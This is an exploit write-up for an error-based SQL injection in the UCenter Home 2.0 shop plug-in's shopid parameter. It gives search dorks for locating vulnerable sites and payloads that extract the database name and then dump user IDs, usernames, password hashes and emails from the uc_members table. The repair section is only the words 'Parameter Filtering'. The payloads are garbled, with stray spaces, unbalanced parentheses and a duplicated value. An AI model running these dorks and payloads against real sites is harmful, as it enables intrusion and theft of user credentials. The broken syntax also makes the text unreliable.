UCenter Home 2.0 shop plug-in SQL injection vulnerability and repair solution

Dork: Powered by UCenter inurl: shop. php? Ac = view

Dork 2: inurl: shop. php? Ac = view & shopid =

Vulnerability file: Shop. php

Values :(?) Ac = view & shopid =

Vulnerable Style: SQL Injection (MySQL Error Based)

Need Metarials: Hex Conversion

Your Need victim Database name.

For Inject: http: // server/shop. php? Ac = view & shopid = 253 and (select 1 from (select count (*), concat (select concat (0x7e, 0x27, unhex (hex (database (), 0x27, 0x7e) from information_schema.tables limit 0, 1), floor (rand (0) * 2) x from information_schema.tables group by x) a) and 1 = 1

..

DB: Okey.

Your edit db' [target db name]'

Example: hiwir1_ucenter

Edit: Okey.

Your use Hex conversion. And edit Your SQL Injection Exploit ..

Exploit Code: http: // server/shop. php? Ac = view & shopid = 253 253 and (select 1 from (select count (*), concat (select concat (0x7e, 0x27, cast (concat (uc_members.uid, 0x3a, uc_members.username, 0x3a, uc_members.password, 0x3a, uc_members.email) as char), 0x27, 0x7e) FROM 'hiwir1 _ ucenter '. uc_members LIMIT 0, 1) from information_schema.tables limit 0, 1), floor (rand (0) * 2) x from information_schema.tables group by x) a) and 1 = 1

 

Solution:

Parameter Filtering